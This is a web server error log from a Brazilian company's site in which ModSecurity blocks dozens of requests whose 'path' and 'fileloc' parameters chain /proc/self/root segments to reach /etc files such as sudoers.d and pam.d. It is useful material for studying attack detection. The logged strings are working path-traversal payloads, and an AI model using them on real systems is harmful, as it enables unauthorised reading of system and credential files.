[Mon Mar 16 16:48:01.102309 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.241.46:40890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhecUr9dMAiw-8KANNa4AAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:03.035909 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:40902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhecrysWC90G-1nBrBXvQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:03.039994 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:49890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhecdSswJuvopo3lOhy-AAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:04.303565 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:40916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhedI6lpbStxTqkSkt-UwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:04.367844 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.243.203:49902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhedKQpVkWug9HeOt9JKgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:05.765804 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:40920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhedaTCbgAP5jq5TehApAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:05.827178 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:49914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhedY6lpbStxTqkSkt-VAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:07.164534 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:40934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhed6TCbgAP5jq5TehApQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:08.243461 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:49924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheeFajLEzk2WiQ-10nBAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:08.386640 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:48938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheeKTCbgAP5jq5TehApwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:09.600770 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.243.203:49934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheeVajLEzk2WiQ-10nBQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:10.671586 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:48952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhees_BxrYCr4hPDw_-LwAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:11.003134 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:60088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhee9SswJuvopo3lOhy-wAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:12.309171 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:60102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhefI6lpbStxTqkSkt-WAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:13.959274 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:48966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhefbysWC90G-1nBrBXwwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:16.486440 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:60116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhegP9ocpUE4ed4uDwGnwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:18.863361 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.241.46:48978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhegqQpVkWug9HeOt9JMQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:48:23.885057 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:60126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheh46lpbStxTqkSkt-XQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:48:25.335438 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.243.203:37250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheiUr9dMAiw-8KANNa6AAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:27.960070 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.243.203:37256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhei6QpVkWug9HeOt9JOQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:48:29.314044 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:37264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhejf9ocpUE4ed4uDwGpgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
